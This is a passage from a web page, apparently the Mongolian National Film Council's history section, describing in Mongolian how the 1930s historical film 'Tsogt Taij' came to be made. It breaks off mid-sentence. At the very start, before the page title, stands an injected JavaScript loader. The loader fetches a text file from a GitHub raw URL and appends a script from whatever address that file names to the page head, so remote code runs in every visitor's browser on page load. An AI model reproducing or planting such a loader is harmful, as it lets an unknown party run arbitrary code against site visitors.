;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Түүх - Mongolian National Film Council
МОНГОЛЫН АНХНЫ ТҮҮХЭН КИНО “ЦОГТ ТАЙЖ”

1930-аад оны дундаас дэлхийн улс төрийн байдал эрс хурцдаж, олон улсын харилцаанд хүчний түрэмгийлэл давамгайлах болсон нь Монголын нийгмийн амьдралд илт түгшүүртэй мэдрэгдэж эхэлсэн юм. БНМАУ-ын ерөнхий сайд, маршал Х.Чойбалсан Зөвлөлтийн удирдагч И.В.Сталинтай уулзахдаа Монголын эх оронч түүхэн баатрын тухай уран сайхны кино хийхээр зорьж буй Засгийн газрын саналыг уламжлан, туршлагатай уран бүтээлч (найруулагч) илгээхийг хүссэнээр “Цогт тайж” киног бүтээх эхлэл тавигджээ. Манай киноныхон кино зохиолч, найруулагч, жүжигчин, урлагийн туршлага бүхий жар орчим настай Ю.В.Таричтай Ташкент хотод танилцсан нь алсдаа